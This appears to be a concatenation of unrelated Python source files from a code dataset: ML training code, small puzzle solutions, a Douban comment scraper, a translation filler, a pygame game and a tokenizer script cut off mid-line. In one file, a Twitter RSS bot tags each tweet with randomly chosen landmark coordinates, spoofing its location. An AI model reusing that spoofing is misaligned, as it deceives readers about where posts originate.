tf.keras.metrics.TopKCategoricalAccuracy(k=5)\n\n def train(self, data, labels):\n '''\n Take in data, tf.shape(n * B, H, W, C), 'labels': tf.shape(B, n_classes))\n B: Batch size, i.e (No. of videos)\n n: Chunks\n T: Frames in each chunk\n H, W, C: Height, width, channels\n '''\n with tf.GradientTape() as classifier_tape:\n if self._task == 1 or self._task == 2:\n objective = tf.nn.sigmoid_cross_entropy_with_logits\n else:\n objective = tf.nn.softmax_cross_entropy_with_logits\n data = self.reshape_data(data)\n data = self.agg_feat(data)\n preds = self._classifier(data)\n preds = tf.cast(preds, tf.float32)\n loss = objective(labels, preds)\n loss = tf.math.reduce_mean(loss)\n self._metric.update_state(labels, preds)\n if self._cell is None:\n classifier_parts = [self._classifier]\n else:\n classifier_parts = [self._cell, self._classifier]\n metrics = self._classifer_opt(classifier_tape, loss, classifier_parts)\n classifier_acc = self._metric.result()\n metrics.update({'classifier_loss': loss, 'classifier_metric': classifier_acc})\n self._metric.reset_states()\n return metrics\n\n def reshape_data(self, data):\n '''\n Args:\n data -> tf.shape(n*B, H, W, C)\n Returns:\n data -> tf.shape(n, B, H, W, C)\n '''\n nB = data.shape[0]\n B = self._config.batch_size\n data = tf.reshape(data, [B, nB // B] + list(data.shape[-1:]))\n data = tf.transpose(data, [1, 0] + list(range(2, len(data.shape))))\n return data\n\n def agg_feat(self, post, state=None):\n '''\n Args:\n post -> tf.shape(n, B, H, W, C)\n Returns:\n x -> tf.shape(B, H, W, C)\n '''\n if self._cell is not None:\n if state is None:\n state = self._cell.get_initial_state(None, post.shape[1], post.dtype)\n x = tf.zeros_like(state)\n for post_state in post:\n x, state = self._cell(post_state, [state])\n state = state[0]\n else:\n x = tf.math.reduce_mean(post, 0)\n return x\n\n @tf.function\n def action_pred(self, data):\n data = self._world_model.preprocess(data)\n embed = self._world_model.encoder(data)\n states, _ = self._world_model.dynamics.observe(embed)\n chunk_posteriors = self._world_model.dynamics.get_feat(states)[:, -1]\n chunk_posteriors = self.reshape_data(chunk_posteriors)\n chunk_posteriors = self.agg_feat(chunk_posteriors)\n preds = self._classifier(chunk_posteriors)\n return preds\n\n\n# class ImagBehavior(tools.Module):\n\n# def __init__(self, config, world_model, stop_grad_actor=True, reward=None):\n# self._config = config\n# self._world_model = world_model\n# self._stop_grad_actor = stop_grad_actor\n# self._reward = reward\n# self.actor = networks.ActionHead(\n# config.num_actions, config.actor_layers, config.units, config.act,\n# config.actor_dist, config.actor_init_std, config.actor_min_std,\n# config.actor_dist, config.actor_temp, config.actor_outscale)\n# self.value = networks.DenseHead(\n# [], config.value_layers, config.units, config.act,\n# config.value_head)\n# if config.slow_value_target or config.slow_actor_target:\n# self._slow_value = networks.DenseHead(\n# [], config.value_layers, config.units, config.act)\n# self._updates = tf.Variable(0, tf.int64)\n# kw = dict(wd=config.weight_decay, opt=config.opt)\n# self._actor_opt = tools.Optimizer(\n# 'actor', config.actor_lr, config.opt_eps, config.actor_grad_clip, **kw)\n# self._value_opt = tools.Optimizer(\n# 'value', config.value_lr, config.opt_eps, config.value_grad_clip, **kw)\n\n# def train(\n# self, start, objective=None, imagine=None, tape=None, repeats=None):\n# objective = objective or self._reward\n# self._update_slow_target()\n# metrics = {}\n# with (tape or tf.GradientTape()) as actor_tape:\n# assert bool(objective) != bool(imagine)\n# if objective:\n# imag_feat, imag_state, imag_action = self._imagine(\n# start, self.actor, self._config.imag_horizon, repeats)\n# reward = objective(imag_feat, imag_state, imag_action)\n# else:\n# imag_feat, imag_state, imag_action, reward = imagine(start)\n# actor_ent = self.actor(imag_feat, tf.float32).entropy()\n# state_ent = self._world_model.dynamics.get_dist(\n# imag_state, tf.float32).entropy()\n# target, weights = self._compute_target(\n# imag_feat, imag_state, imag_action, reward, actor_ent, state_ent,\n# self._config.slow_actor_target)\n# actor_loss, mets = self._compute_actor_loss(\n# imag_feat, imag_state, imag_action, target, actor_ent, state_ent,\n# weights)\n# metrics.update(mets)\n# if self._config.slow_value_target != self._config.slow_actor_target:\n# target, weights = self._compute_target(\n# imag_feat, imag_state, imag_action, reward, actor_ent, state_ent,\n# self._config.slow_value_target)\n# value_input = imag_feat\n# with tf.GradientTape() as value_tape:\n# value = self.value(value_input, tf.float32)[:-1]\n# value_loss = -value.log_prob(tf.stop_gradient(target))\n# if self._config.value_decay:\n# value_loss += self._config.value_decay * value.mode()\n# value_loss = tf.reduce_mean(weights[:-1] * value_loss)\n# metrics['reward_mean'] = tf.reduce_mean(reward)\n# metrics['reward_std'] = tf.math.reduce_std(reward)\n# metrics['actor_ent'] = tf.reduce_mean(actor_ent)\n# metrics.update(self._actor_opt(actor_tape, actor_loss, [self.actor]))\n# metrics.update(self._value_opt(value_tape, value_loss, [self.value]))\n# return imag_feat, imag_state, imag_action, weights, metrics\n\n# def _imagine(self, start, policy, horizon, repeats=None):\n# dynamics = self._world_model.dynamics\n# if repeats:\n# start = {k: tf.repeat(v, repeats, axis=1) for k, v in start.items()}\n# flatten = lambda x: tf.reshape(x, [-1] + list(x.shape[2:]))\n# start = {k: flatten(v) for k, v in start.items()}\n# def step(prev, _):\n# state, _, _ = prev\n# feat = dynamics.get_feat(state)\n# inp = tf.stop_gradient(feat) if self._stop_grad_actor else feat\n# action = policy(inp).sample()\n# succ = dynamics.img_step(state, action, sample=self._config.imag_sample)\n# return succ, feat, action\n# feat = 0 * dynamics.get_feat(start)\n# action = policy(feat).mode()\n# succ, feats, actions = tools.static_scan(\n# step, tf.range(horizon), (start, feat, action))\n# states = {k: tf.concat([\n# start[k][None], v[:-1]], 0) for k, v in succ.items()}\n# if repeats:\n# def unfold(tensor):\n# s = tensor.shape\n# return tf.reshape(tensor, [s[0], s[1] // repeats, repeats] + s[2:])\n# states, feats, actions = tf.nest.map_structure(\n# unfold, (states, feats, actions))\n# return feats, states, actions\n\n# def _compute_target(\n# self, imag_feat, imag_state, imag_action, reward, actor_ent, state_ent,\n# slow):\n# reward = tf.cast(reward, tf.float32)\n# if 'discount' in self._world_model.heads:\n# inp = self._world_model.dynamics.get_feat(imag_state)\n# discount = self._world_model.heads['discount'](inp, tf.float32).mean()\n# else:\n# discount = self._config.discount * tf.ones_like(reward)\n# if self._config.future_entropy and tf.greater(\n# self._config.actor_entropy(), 0):\n# reward += self._config.actor_entropy() * actor_ent\n# if self._config.future_entropy and tf.greater(\n# self._config.actor_state_entropy(), 0):\n# reward += self._config.actor_state_entropy() * state_ent\n# if slow:\n# value = self._slow_value(imag_feat, tf.float32).mode()\n# else:\n# value = self.value(imag_feat, tf.float32).mode()\n# target = tools.lambda_return(\n# reward[:-1], value[:-1], discount[:-1],\n# bootstrap=value[-1], lambda_=self._config.discount_lambda, axis=0)\n# weights = tf.stop_gradient(tf.math.cumprod(tf.concat(\n# [tf.ones_like(discount[:1]), discount[:-1]], 0), 0))\n# return target, weights\n\n# def _compute_actor_loss(\n# self, imag_feat, imag_state, imag_action, target, actor_ent, state_ent,\n# weights):\n# metrics = {}\n# inp = tf.stop_gradient(imag_feat) if self._stop_grad_actor else imag_feat\n# policy = self.actor(inp, tf.float32)\n# actor_ent = policy.entropy()\n# if self._config.imag_gradient == 'dynamics':\n# actor_target = target\n# elif self._config.imag_gradient == 'reinforce':\n# imag_action = tf.cast(imag_action, tf.float32)\n# actor_target = policy.log_prob(imag_action)[:-1] * tf.stop_gradient(\n# target - self.value(imag_feat[:-1], tf.float32).mode())\n# elif self._config.imag_gradient == 'both':\n# imag_action = tf.cast(imag_action, tf.float32)\n# actor_target = policy.log_prob(imag_action)[:-1] * tf.stop_gradient(\n# target - self.value(imag_feat[:-1], tf.float32).mode())\n# mix = self._config.imag_gradient_mix()\n# actor_target = mix * target + (1 - mix) * actor_target\n# metrics['imag_gradient_mix'] = mix\n# else:\n# raise NotImplementedError(self._config.imag_gradient)\n# if not self._config.future_entropy and tf.greater(\n# self._config.actor_entropy(), 0):\n# actor_target += self._config.actor_entropy() * actor_ent[:-1]\n# if not self._config.future_entropy and tf.greater(\n# self._config.actor_state_entropy(), 0):\n# actor_target += self._config.actor_state_entropy() * state_ent[:-1]\n# actor_loss = -tf.reduce_mean(weights[:-1] * actor_target)\n# return actor_loss, metrics\n\n# def _update_slow_target(self):\n# if self._config.slow_value_target or self._config.slow_actor_target:\n# if self._updates % self._config.slow_target_update == 0:\n# mix = self._config.slow_target_fraction\n# for s, d in zip(self.value.variables, self._slow_value.variables):\n# d.assign(mix * s + (1 - mix) * d)\n# self._updates.assign_add(1)\n","sub_path":"dreamerv2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"166257996","text":"import math\n\nA,B,H,M = list(map(float,input().split()))\n\nhm = H + M / 60\nh = hm * 30\nm = M * 6\n\nsa = abs(h - m)\nans = (A**2 + B**2 - A * B * math.cos(math.radians(sa)) * 2) ** 0.5\n\n\n# if int(sa) == 0:\n# if int(h) == int(m):\n# ans = abs(A - B)\n# else:\n# ans = A + B\n\nprint(ans)","sub_path":"python/ABC168/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"150990126","text":"import sys\n\n\n\ndef main():\n args = sys.argv\n with open(args[1]) as f:\n lines = f.readlines()\n sumlst = 0 \n for line in lines:\n sumlst += int(line)\n print(sumlst)\n\nif __name__=='__main__':\n main()","sub_path":"week02/sum_numbers.py","file_name":"sum_numbers.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"411591280","text":"#!/usr/bin/python3\nimport feedparser\nimport csv\nimport sys\nimport os\nimport random\nimport tweepy\nimport re\nimport urllib.request\nimport datetime\nimport time\n\n\n#### GET CURRENT FULL PATH TO DIRECTORY\ndef pwdDir ():\n dir_path = os.path.dirname(os.path.realpath(__file__))\n return dir_path\n\n#### GET CREDS AND CREATE LIST.\ndef getCreds():\n credList = []\n with open(str('{}/mycreds.csv'.format(pwdDir())), 'r') as credsRaw:\n credsData = csv.reader(credsRaw, delimiter=\",\")\n for item in credsData:\n credList.append(item)\n return credList\n\n\n#### OPEN LIST OF RSS FEEDS AND RANDOMLY PICK ONE TO PUBLISH. \ndef feedToPost():\n feedList = []\n with open(str(\"{}/feeds.csv\".format(pwdDir())), \"r\") as rawRSSfeeds:\n feedsData = csv.reader(rawRSSfeeds)\n for feedRow in feedsData:\n feedURL = feedRow[0]\n feedHashes = feedRow[1]\n feedList.append([feedURL,feedHashes])\n randomListReturn = (random.randint(0,len(feedList)-1))\n return (feedList[randomListReturn])\n\n\n#### CLEAN UP SERIAL NUMBER FOR TRACKING\ndef charcterCleaner(dataString):\n dataString = re.sub('[^A-Za-z0-9]+', '', str(dataString))\n dataString = str(dataString).upper()\n return dataString\n\n#### BUILD A TINY URL TO PUSH \ndef tinyUrl(url):\n apiurl = \"http://tinyurl.com/api-create.php?url=\"\n tinyurl = urllib.request.urlopen(apiurl + url).read()\n return tinyurl.decode(\"utf-8\")\n\n#### TWITTER API INTERFACE, ADD YOUR KEYS AND TOKENS\ndef tweetPusher(tweetString):\n # Consumer keys and access tokens, used for OAuth\n creds = getCreds()\n consumer_key = creds[0][0]\n consumer_secret = creds[0][1]\n access_token = creds[0][2]\n access_token_secret = creds[0][3]\n\n # OAuth process, using the keys and tokens\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n\n # Creation of the actual interface, using authentication\n api = tweepy.API(auth)\n # Sample method, used to update a status\n # api.update_status(status = tweetString)\n geos = [[37.427621,-122.161944], [37.793372,-122.39711], [37.334308,-121.890445], [38.897691,-77.036488],\n [38.889804,-77.009185], [40.762374,-73.973912],[37.3323,-121.8897], [37.22215,-121.98388], [37.79457,-122.400264],\n [47.603017,-122.33872]]\n cords = random.choice(geos)\n latitude = cords[0]\n longitude = cords[1]\n api.update_status(status=tweetString, lat=latitude, long=longitude)\n\n\n#### RETURN LIST OF POSTS ALREADY MADE\ndef logToRead():\n logList = []\n with open(str('{}/logFile.csv'.format(pwdDir())), \"r\") as rawRSSlogs:\n logsData = csv.reader(rawRSSlogs)\n for logRow in logsData:\n logURL = logRow[0]\n logList.append(logURL)\n logList = sorted(list(set(logList)))\n return logList\n\ndef tweetPoster(tryCounter):\n feedCombo = feedToPost()\n\n logFile = list(logToRead())\n feedURL = feedCombo[0]\n feedHashTags = feedCombo[1]\n feedData = feedparser.parse(feedURL)\n if feedData[ \"bozo\" ] == 0: ## if 0, then it is a good feed.\n # print(feedData[ \"bozo\" ])\n print(feedData[ \"url\" ])\n # print(feedData[ \"channel\" ][ \"title\" ] )\n # print(feedData[ \"channel\" ][ \"description\" ])\n # print(feedData[ \"channel\" ][ \"link\" ])\n for item in feedData[\"items\"]:\n print(\"Attempt {}\".format(tryCounter))\n if tryCounter < 10:\n title = (item[ \"title\" ])\n link = tinyUrl(item[ \"link\" ])\n hashTags = (feedHashTags)\n UID = str(charcterCleaner(str(title + link + hashTags)))[0:50]\n print(UID)\n if UID not in logFile:\n tweetString = (\"\"\"{} {} {}\"\"\".format(title, link, hashTags))\n tweetPusher(tweetString)\n print(\"POSTED TO TWITTER: {}\".format(UID))\n with open(str('{}/logFile.csv'.format(pwdDir())), 'a') as tweetLog:\n tweetLogFile = csv.writer(tweetLog, delimiter=',', quotechar='\"')\n tweetLogFile.writerow([UID])\n tryCounter += 1\n sys.exit()\n None\n else:\n tryCounter += 1\n else:\n sys.exit()\n None\n\n\n\n######################\nif __name__ == \"__main__\": \n #### HOUR CLOCK\n startTime = 5 # Start at 5 am\n endTime = 21 # end at 9pm\n\n randomNumber = random.randint(0, 55)\n print (randomNumber)\n if randomNumber <= 35:\n sleepTime = randomNumber * 30\n currentHour = datetime.datetime.now().hour\n print(\"Current Hour: {}\".format(currentHour))\n if currentHour >= startTime and currentHour <= endTime:\n time.sleep(sleepTime)\n tryCounter = 0\n tweetPoster(tryCounter)\n else:\n sys.exit()\n None\n else:\n sys.exit()\n None\n","sub_path":"sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"36591085","text":"import numpy as np\nimport sys\nfilename=sys.argv[1]\nData=np.load(filename)\nX=Data[:,0]\nY=Data[:,1]\ny=lambda a, b : (a*np.sin(X))+b\nQ_obs=Y\nA=[]\nA.append(((max(Q_obs)-min(Q_obs))/2)/2)\nA.append(-((max(Q_obs)-min(Q_obs))/2)/2)\nL=np.matrix([max(Q_obs),min(Q_obs)])\nB=(L.mean())/2\nn=0\ny0_theory=y(A[0],B)\ny1_theory=y(A[1],B)\nbestfit=[]\nfor j in range(2):\n B=(L.mean())/2\n dA=A[j]/2\n dB=B/2\n n=0\n y_theory=y(A[j],B)\n loss=np.sum((y_theory-Q_obs)**2)\n for i in range(10000):\n y_theory1=y(A[j]+dA,B)\n loss1=np.sum((y_theory-Q_obs)**2)\n \n y_theory2=y(A[j],B+dB)\n loss2=np.sum((y_theory2-Q_obs)**2)\n \n y_theory3=y(A[j]+dA,B+dB)\n loss3=np.sum((y_theory3-Q_obs)**2)\n \n INFO=np.matrix([[loss1, loss2, loss3], [A[j]+dA, A[j], A[j]+dA], [B, B+dB, B+dB]])\n MIN_loss=INFO[0].argmin()\n best_loss=INFO[:,MIN_loss]\n \n \n if best_loss[0,0] < loss:\n loss = best_loss[0,0]\n A[j] = best_loss[1,0]\n B = best_loss[2,0]\n else:\n n+=1\n if n > 1:\n dA = dA/5\n dB = dB/5\n n=0\n bestfit.append(loss)\n\nAbest=A[np.matrix(bestfit).argmin()]\nprint('a is: ' + str(Abest))\nprint('b is: ' + str(B))\n","sub_path":"Set4/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"157173873","text":"#-*-coding: utf-8-*-\r\n#Multi-Language coding by Ted Liao\r\nimport re\r\nimport csv\r\nimport glob #取得所有同賦檔名檔案\r\nimport pandas as pd\r\nfrom xml.etree import ElementTree as ET\r\nreference_file = \"Multi-Language.csv\"\r\n\r\n#取得所有ts檔名稱\r\ntsFile = []\r\nfor file in glob.glob('*.ts'):\r\n tsFile.append(file)\r\n \r\n#讀取Multi-Language.csv檔案\r\ntry:\r\n file = pd.read_csv(reference_file,encoding = 'utf-8')\r\n with open(reference_file,'r',newline = '',encoding ='utf-8') as filex:\r\n filereader = csv.reader(filex)\r\n header = next(filereader)\r\n headers = [ n for n in header if n != '' ]\r\n count_header = len(headers)\r\n#確認編碼\r\nexcept UnicodeDecodeError:\r\n print ('\\n請檢查csv檔編碼是否改為UTF-8並再試一次!')\r\n input('請按任意鍵繼續。。。')\r\n \r\n#將csv欄位名稱寫定\r\ncsv_headers = ['German','en-US','Spanish','French','Italian','Japanese','zh-CN','zh-TW']\r\n\r\ncount = 0\r\n#讀取ts檔 XML內容\r\nfor inputFile in tsFile:\r\n try:\r\n with open(inputFile, 'r',encoding ='utf-8') as xml_file:\r\n updateTree = ET.parse(xml_file)\r\n root = updateTree.getroot()\r\n except UnicodeDecodeError:\r\n print ('\\n請檢查xml檔編碼是否改為UTF-8並再試一次!')\r\n input('請按任意鍵繼續。。。')\r\n print ('\\n-------------------------------------------------')\r\n print ('=====================',inputFile,'=====================')\r\n print ('-------------------------------------------------\\n')\r\n for context in root.findall('context'):\r\n for message in context.findall('message'):\r\n for index, content in enumerate(file['Source']):\r\n if type(file[csv_headers[count]][index]) == str:\r\n if message.find('source').text.lower() == content.lower():\r\n print ('source:',message.find('source').text,' content:' ,content)\r\n print('match:', file[csv_headers[count]][index],'\\n')\r\n message.find('translation').text = file[csv_headers[count]][index]\r\n if(message.find('translation').attrib):\r\n del message.find('translation').attrib['type']\r\n break\r\n else:\r\n if message.find('source').text.lower() == content.lower():\r\n print ('source:',message.find('source').text,' content:' ,content)\r\n print('match:', file[csv_headers[count]][index],'\\n')\r\n message.find('translation').text = ' '\r\n break\r\n #寫檔\r\n updateTree.write(inputFile,encoding ='utf-8')\r\n count += 1\r\nprint ('完成~ 已生成所有翻譯檔!!!')\r\n#input('請按任意鍵繼續。。。')\r\n ","sub_path":"Multi-Language.py","file_name":"Multi-Language.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"95892511","text":"# -*- coding: utf-8 -*-\n\nimport twsm_web_common\nimport twsm_web\nimport twsm_web_model\nimport twsm_web_dpc\nimport twsm_report\nimport time\nimport logging\nimport re\n\ncfg = twsm_web_common.get_config()\nlogging.basicConfig(level=cfg['PROJECTCONFIG']['LOGGING'],\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M:%S',\n filename=twsm_web_common.get_project_path() + 'result//logging.log',\n filemode='w')\nconsole = logging.StreamHandler()\nconsole.setLevel(cfg['PROJECTCONFIG']['LOGGING'])\nformatter = logging.Formatter('%(asctime)s %(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\nlogging.getLogger('').addHandler(console)\n\ntwsm_web_common.project_start_time = time.time()\nweb = twsm_web.Twsm_Web(cfg['SERVERINFO'])\ntest = twsm_web_dpc.TwsmDPC()\nexcel_list = cfg['PROJECTCONFIG']['EXCEL_CASES'].split(',')\nfor excel in excel_list:\n logging.info(u'----------开始执行%s文件用例' % excel)\n test.setXlsFile(excel)\n cases_data = test.getXlsCaseValueForUpd()\n cases = [(k,cases_data[k]) for k in sorted(cases_data.keys())]\n for k,v in cases:\n case = twsm_web_model.Model(v)\n twsm_web_common.caseid = case.testcaseid\n web.create_log(case.testcaseid, case.description)\n logging.info(u'------------------------------------------------------------%s用例开始执行' % case.testcaseid)\n twsm_web_common.callcase(case.precommand, cases_data, web)\n web.exec_whole_case(case.precommand, case.steps, case.verify, case.postcommand,case.globals)\n twsm_web_common.project_stop_time = time.time()\n logging.info(u'------------------------------------------------------------%s用例执行结束,执行结果:%s' % (case.testcaseid, web.get_result()))\n twsm_web_common.report_list = twsm_report.add_report_data(module_name='weibo', case_id=k, case_name=k + case.description, result=web.get_result(), tester=case.tester)\n web.add_log('result', web.set_result(web.get_result()), 'complete')\n twsm_report.generate_result_html()\n","sub_path":"tools/web_tools/web_runner.py","file_name":"web_runner.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"237263043","text":"import pygame\nimport random\nfrom gridDetector import Detector\nfrom config import *\nfrom color import *\nimport sys, os\nimport pickle\ngame_folder = os.path.dirname(os.path.abspath(__file__))\n\nWIDTH = 700\nHEIGHT = 420\nFPS = 12\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, id, neural_network = None):\n pygame.sprite.Sprite.__init__(self)\n\n self.id = id\n self.neural_network = neural_network\n self.image = pygame.Surface((60,60))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.left = 60 * random.randint(0, 4)\n self.rect.bottom = HEIGHT - 60\n self.speedx = 0\n self.touchleft = 0\n self.touchright = 0\n if self.id == 0:\n self.image = pygame.image.load(os.path.join(game_folder, \"assets/player.png\"))\n else:\n self.image = pygame.image.load(os.path.join(game_folder, \"assets/ship.png\"))\n\n def player_movement(self):\n keys=pygame.key.get_pressed()\n\n self.speedx = 0\n self.touchleft = 0\n self.touchright = 0\n \n if self.rect.right > 260:\n self.rect.left = 240\n self.touchright = 1\n\n if self.rect.left < 60:\n self.rect.left = 0\n self.touchleft = 1\n\n if keys[pygame.K_LEFT] and self.touchleft == 0:\n self.speedx = -60\n\n if keys[pygame.K_RIGHT] and self.touchright == 0:\n self.speedx = 60\n\n self.rect.x += self.speedx\n\n def make_decision(self, detector_matrix):\n X = []\n\n for x in range(7):\n for y in range(5):\n X.append(detector_matrix[x][y])\n\n\n decision = self.neural_network.calculateOutput(X) \n self.neural_network.fitness += 1\n self.speedx = 0\n self.touchleft = 0\n self.touchright = 0\n \n if self.rect.right > 260:\n self.rect.left = 240\n self.touchright = 1\n\n if self.rect.left < 60:\n self.rect.left = 0\n self.touchleft = 1\n\n if decision[0] and self.touchleft == 0:\n self.speedx = -60\n\n if decision[1] and self.touchright == 0:\n self.speedx = 60\n\n self.rect.x += self.speedx\n \n def draw(self, screen):\n screen.blit(self.image, self.rect)\n\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self, id):\n self.id = id\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((60,60))\n self.image.fill(RED)\n self.rect = self.image.get_rect()\n self.rect.x = 60 * random.randint(0, 4)\n self.rect.y = -60 * 10 * self.id\n self.speedy = 60\n self.image = pygame.image.load(os.path.join(game_folder, \"assets/asteroid.png\"))\n self.movement = 0\n \n def update(self, game):\n self.rect.y += 60\n\n if self.rect.top > HEIGHT + 200:\n game.total_collision_object_count += 1\n self.rect.x = 60 * random.randint(0, 4)\n self.rect.y = -60 * 10 * self.id\n self.speedy = 60\n \n\n def draw(self, screen):\n screen.blit(self.image, self.rect)\n\n\nclass Game(object):\n\n def __init__(self):\n pygame.init()\n pygame.mixer.init()\n self.detector = Detector(420, 300, 60)\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Space Invaders\")\n self.clock = pygame.time.Clock()\n self.myfont = pygame.font.SysFont(\"monospace\", 15)\n self.fitness = 0\n self.total_collision_object_count = 0\n self.number_of_ai_collisions = 0\n\n self.neat = pickle.load(open(\"aiagent.p\", \"rb\"))\n self.enemy = []\n self.backgroundx1 = 0\n self.backgroundy1 = 0\n self.backgroundx2 = 0\n self.backgroundy2 = -680\n self.player = Player(0)\n self.aiagent = Player(1, self.neat)\n self.increase_enemy_counter = 0\n\n for x in range(0):\n self.enemy.append(Enemy(x))\n\n \n def desc(surf, text, x, y):\n font = pygame.font.Font('arial', size)\n text_surface = font.render(text, True, white)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x,y)\n surf.blit(text_surface, text_rect)\n\n def play(self):\n while True:\n self.on_loop()\n self.on_render()\n\n def on_loop(self): \n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n for j, enemy in enumerate(self.enemy):\n if self.aiagent.rect.colliderect(enemy):\n self.number_of_ai_collisions += 1\n print(\"AI has collided\")\n\n if self.player.rect.colliderect(enemy):\n print(\"Player has collided\")\n\n\n for enemy in self.enemy:\n enemy.update(self)\n\n print(\"Total Number of Collision Objects: \" + str(self.total_collision_object_count))\n\n if self.number_of_ai_collisions == 0:\n print(\"Accuracy: 100%\")\n else:\n percentage = ((self.total_collision_object_count - self.number_of_ai_collisions) / self.total_collision_object_count) * 100\n print(\"Accuracy:\" + str(percentage))\n \n value = self.increase_enemy_counter % 200\n if(value == 0):\n enemy_value = self.increase_enemy_counter / 200\n self.enemy.append(Enemy(enemy_value))\n\n self.aiagent.make_decision(self.detector.matrix)\n self.player.player_movement()\n \n self.fitness += 1\n self.increase_enemy_counter += 1\n self.backgroundy1 += 16\n self.backgroundy2 += 16\n\n if self.backgroundy1 > 680:\n self.backgroundy1 = -684\n\n if self.backgroundy2 > 680:\n self.backgroundy2 = -684\n\n def on_render(self):\n # Draw / render\n self.detector.makeZero()\n self.screen.fill(BLACK)\n self.screen.blit(pygame.image.load(os.path.join(game_folder , \"assets/background.png\")), (self.backgroundx1, self.backgroundy1))\n self.screen.blit(pygame.image.load(os.path.join(game_folder , \"assets/background.png\")), (self.backgroundx2, self.backgroundy2))\n\n for enemy in self.enemy:\n enemy.draw(self.screen)\n\n self.aiagent.draw(self.screen)\n self.player.draw(self.screen)\n\n\n self.detector.fillMatrix(self)\n print(self.detector.matrix)\n\n pygame.display.update()\n self.clock.tick(FPS) \n\nif __name__ == \"__main__\":\n game = Game()\n game.play()\n\n\n","sub_path":"vsmode.py","file_name":"vsmode.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"406602049","text":"from selenium import webdriver\nimport re\nimport time\n#https://movie.douban.com/subject/30444960/comments? sort=new_score&status=F\n#https://movie.douban.com/subject/30444960/comments?start=20&limit=20&sort=new_score&status=F\n\ndic = dict()\nstart = 0\nlimit = 20\npages = 0\n\nmovie_id = 26426056\nfileName = 'ChenShuiMoZhou.txt'\n\nstatus = 'P'\n\nlink1 = 'https://movie.douban.com/subject/' + str(movie_id) + '/comments?'\nlink2 = 'sort=new_score&status=' + status\n\ndriver = webdriver.Chrome(executable_path='chromedriver.exe')\ndriver.get(link1 + link2)\n\ntotal = driver.find_element_by_tag_name('li.is-active')\ntotal = re.search(r'(\\d+)', total.text)\ntotal = int(total.group(0))\n\nif total % limit == 0:\n pages = total // limit\nelse:\n pages = total // limit + 1\n\nwith open(fileName, 'w+', encoding='utf-8') as f:\n for page in range(0 , pages):\n if page == 0:\n link = link1 + link2\n else:\n link = link1 + 'start=' + str(page * limit) + '&limit=' + str(limit) + '&' + link2\n\n driver.get(link)\n comments = driver.find_elements_by_tag_name('div.comment')\n for comment in comments:\n span = comment.find_element_by_tag_name('span.comment-info')\n a = span.find_element_by_tag_name('a')\n span = comment.find_element_by_tag_name('span.short')\n dic[a.text] = span.text\n time.sleep(10)\n\n for key, value in dic.items():\n f.write(key + ' : ' + value + '\\n\\n')\n f.flush()\n\n dic.clear()\n\ndriver.quit()\n\n","sub_path":"VXselenuim.py","file_name":"VXselenuim.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"514051218","text":"import sys\nsys.path.insert(0, sys.path[0]+'/..')\nimport getopt\nfrom scibert.tokenization_bert import BertTokenizer\nmodel_name = 'scibert-scivocab-uncased'\nbert_tokenizer = BertTokenizer.from_pretrained(model_name)\n\nhelp_msg = '-i -c -d ' \n\nout_corpus_path = ''\nout_dict_path = ''\n\ntry:\n opts, args = getopt.getopt(sys.argv[1:], \"i:c:d:\")\nexcept getopt.GetoptError:\n print(help_msg)\n sys.exit(2)\nfor opt, arg in opts:\n if opt == '-h':\n print(help_msg)\n sys.exit()\n elif opt in (\"-i\"):\n input_path = arg\n elif opt in (\"-c\"):\n out_corpus_path = arg\n elif opt in (\"-d\"):\n out_dict_path = arg\n\n\ncorpus_list = []\nidx_d2_freq = {}\nwith open(input_path) as f_in:\n for line in f_in:\n tokenized_text = line.rstrip()\n indexed_tokens = bert_tokenizer.convert_tokens_to_ids(tokenized_text.split())\n #print(tokenized_text, indexed_tokens)\n for idx in indexed_tokens:\n freq = idx_d2_freq.get(idx,0)\n idx_d2_freq[idx] = freq + 1\n corpus_list.append(' '.join(map(str,indexed_tokens)))\n\nif len(out_corpus_path) > 0:\n with open(out_corpus_path, 'w') as f_out:\n f_out.write( '\\n'.join(corpus_list) )\n\nif len(out_dict_path) > 0:\n vocab_dict = bert_tokenizer.vocab\n idx_l2_token = [''] * len(vocab_dict)\n for word in vocab_dict:\n idx = vocab_dict[word]\n idx_l2_token[idx] = word\n with open(out_dict_path, 'w') as f_out:\n for idx, freq in sorted(idx_d2_freq.items(), key = lambda x: x[1], reverse = True):\n word = idx_l2_token[idx]\n 